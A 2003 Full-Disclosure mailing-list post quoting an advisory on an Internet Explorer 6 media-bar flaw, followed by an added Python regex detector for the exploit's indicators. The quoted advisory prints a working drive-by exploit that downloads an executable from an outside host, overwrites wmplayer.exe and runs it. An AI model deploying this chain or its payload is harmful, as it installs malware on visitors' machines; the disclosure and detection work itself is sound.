Same problem occurs on Windows 2000 and Windows 2003 Server...

Greetings,

Dj MegaWorld / Marius van Witzenburg
"It's the music... That never fades!"
Url: http://www.djmegaworld.nl/

----- Original Message -----
From: "jelmer" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, September 12, 2003 0:31
Subject: Internet Explorer 6 on Windows XP allows execution of arbitrary code

> Internet Explorer 6 on Windows XP allows execution of arbitrary code
>
> DESCRIPTION:
>
> Yesterday Liu Die Yu released a series of advisories concerning Internet
> Explorer. By combining one of these issues with an earlier issue I myself
> reported a while back, you can construct a specially crafted webpage that
> can take any action on a user's system, including but not limited to
> installing trojans, keyloggers, wiping the user's hard drive, etc.
>
> TECHNICAL EXPLANATION:
>
> Internet Explorer 6 comes with a media sidebar in which you can load and
> play media clips without even leaving the browser. When you instruct the
> media bar to load a file from an unknown host, or the HTTP status returned
> by an existing host indicates an error, this media bar displays an error
> page inside the media bar, namely
>
> res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
>
> res URLs are treated as being in the "My Computer" zone and are loaded
> from the user's filesystem: perfect conditions for the issue I describe on
>
> http://www.mail-archive.com/[EMAIL PROTECTED]/msg06791.html
>
> to work. Now all that is needed is a way to inject this exploit code into
> this page. This method was graciously provided by Liu Die Yu, as you can
> read on
>
> http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
>
> Combining these issues we get something like:
>
> --snip--
>
> <textarea id="code" style="display:none;">
>
> var x = new ActiveXObject("Microsoft.XMLHTTP");
> x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
> x.Send();
>
> var s = new ActiveXObject("ADODB.Stream");
> s.Mode = 3;
> s.Type = 1;
> s.Open();
> s.Write(x.responseBody);
>
> s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
> location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
> function preparecode(code) {
>   result = '';
>   lines = code.split(/\r\n/);
>   for (i=0;i<lines.length;i++) {
>     line = lines[i];
>     line = line.replace(/^\s+/,"");
>     line = line.replace(/\s+$/,"");
>     line = line.replace(/'/g,"\\'");
>     line = line.replace(/[\\]/g,"\\\\");
>     line = line.replace(/[/]/g,"%2f");
>     if (line != '') {
>       result += line +'\\r\\n';
>     }
>   }
>   return result;
> }
>
> function doit() {
>   mycode = preparecode(document.all.code.value);
>   myURL = "file:javascript:eval('" + mycode + "')";
>   window.open(myURL,"_media")
> }
>
> window.open("error.jsp","_media");
>
> setTimeout("doit()", 5000);
>
> </script>
>
> --snip--
>
> error.jsp is a JSP page that consists of one line, namely
>
> <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
>
> DEMONSTRATION:
>
> A demonstration is provided at:
>
> http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
>
> WORKAROUND:
>
> Disable active scripting or do "the sensible thing" and pick another
> browser such as the excellent Mozilla Firebird.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
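Detection logic for the chain described in the quoted advisory, added here as an example; it is not part of the original post and not code by its author. It scans page or proxy-captured HTML for the combination of indicators the advisory names (the Microsoft.XMLHTTP fetch, the ADODB.Stream/SaveToFile write to disk, a file:javascript: URL, a res:// URL, and a window.open aimed at the _media frame) and scores them, so a content filter or IDS rule can flag the pattern rather than a single string. The indicator weights, the threshold and the two constructed samples are assumptions of this example.

```python
import re

# Indicator patterns derived from the exploit chain in the advisory above.
# Each entry is (name, compiled regex, weight). The weights are an assumption
# of this example, chosen so that the two-part combinations the advisory
# relies on (download + write, or injected URL + media-bar target) score
# above the threshold on their own.
INDICATORS = [
    ("xmlhttp_activex",
     re.compile(r'ActiveXObject\(\s*["\']Microsoft\.XMLHTTP["\']', re.I), 1),
    ("adodb_stream",
     re.compile(r'ActiveXObject\(\s*["\']ADODB\.Stream["\']', re.I), 2),
    ("savetofile",
     re.compile(r'\.SaveToFile\s*\(', re.I), 2),
    ("file_javascript_url",
     re.compile(r'file:\s*javascript:', re.I), 3),
    ("res_url",
     re.compile(r'res://', re.I), 1),
    # window.open(...) whose target argument is the media bar frame "_media";
    # non-greedy with DOTALL so arguments containing ')' or newlines still match.
    ("media_bar_target",
     re.compile(r'window\.open\(.*?["\']_media["\']', re.I | re.S), 2),
]

DEFAULT_THRESHOLD = 5  # assumption of this example


def scan_html(text):
    """Return which indicators appear in `text` and their summed weight."""
    matches = []
    score = 0
    for name, pattern, weight in INDICATORS:
        if pattern.search(text):
            matches.append(name)
            score += weight
    return {"matches": matches, "score": score}


def is_suspicious(text, threshold=DEFAULT_THRESHOLD):
    """Flag content whose indicator score reaches the threshold, or that pairs
    an injected file:javascript: URL with a media-bar window.open target."""
    result = scan_html(text)
    strong_pair = ("file_javascript_url" in result["matches"]
                   and "media_bar_target" in result["matches"])
    return result["score"] >= threshold or strong_pair


# Constructed samples (not captured traffic). The first is an ordinary
# XMLHTTP request of the kind intranet pages of that era used; the second
# carries the indicator combination without any working payload.
BENIGN_SAMPLE = r"""
<html><body><script>
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.open("GET", "/api/data", false);
x.send();
</script></body></html>
"""

SUSPECT_SAMPLE = r"""
<html><body><script>
var s = new ActiveXObject("ADODB.Stream");
s.SaveToFile("C:/placeholder.exe", 2);
window.open("file:javascript:eval('PLACEHOLDER')", "_media");
</script></body></html>
"""

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("suspect", SUSPECT_SAMPLE)):
        r = scan_html(sample)
        print(label, r["score"], r["matches"], "suspicious" if is_suspicious(sample) else "ok")
```

In a proxy or mail gateway this would run over decoded response bodies; the single-indicator hit on the benign sample shows why the score combines indicators instead of blocking on `Microsoft.XMLHTTP` alone, which was common in legitimate pages.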
